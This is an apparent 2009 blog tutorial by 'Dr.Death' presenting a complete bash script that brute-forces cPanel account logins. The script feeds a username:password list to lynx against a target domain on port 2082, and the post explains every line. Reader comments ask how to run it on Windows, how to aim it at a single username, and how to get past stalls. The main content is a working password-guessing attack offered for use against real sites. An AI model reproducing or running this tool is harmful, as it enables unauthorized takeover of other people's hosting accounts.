Wednesday, January 14, 2009

how to build your own BruteForce tool using linux shell script



Hello, did you ever try to brute force a website login page and you didn't find the right tool?
it always happen, so i will explain how i did it with linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#############################
#  _____       _____             _   _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo
".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

lets explain what we did:

  • #!/usr/bin/env bash
to execute the script using bash shell from the environment "env".

  • read site
set the user input as variable "$site" which will be the website domain name.

  • n=`cat pass_list | wc -l`
this will print how many lines in file "pass_list" which include passwords list.

  • for (( i=1; i <= $n; i++));
we put the number we got for the variable "$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.

  • password=`sed -n "$i"p pass_list`
here we use "sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.

  • b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "lynx" the linux command line browser as a socket to connect to the target website.
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"

so password file pass_list should include the usernames and passwords in this format: "username:password"

  • if [ ! -z "$b" ]; then
here we use if statment with option "! -z" which mean if value of "$b" is not equal to Zero we are logged in and the password is the value of the variable "$password" in the loop we are in and exit successfuly, else continue the loop.

Thats all falks :)
Dr.Death

8 comments:

  1. Is There Any Way To Use IT In Windows ?!! i dont know how i mean the bash script !

    ReplyDelete
  2. Hello, yes you can run it with cygwin unix under windows.

    ReplyDelete
  3. i tried it nice script but for sum reason lynx couldnt conect

    ReplyDelete
  4. Hi, try first to connect to the target website using lynx for troubleshoot

    lynx "website.com"
    lynx "website.com:2082"

    check maybe the website doesn't run cpanel on it

    ReplyDelete
  5. hey how to run it in windows 7

    ReplyDelete
  6. what file extension should i use?

    ReplyDelete
  7. Great, thanx. Really useful, I added -read_timeout=30 parameter to the lynx command because I was getting stuck at try ~400.

    The command ends up like this:
    b=`lynx -dump -nolist -read_timeout=30 -auth="$password" ""$site":80"`

    ReplyDelete
  8. How how can i edit this code if i have username and i just want to brute pass for that username ?

    ReplyDelete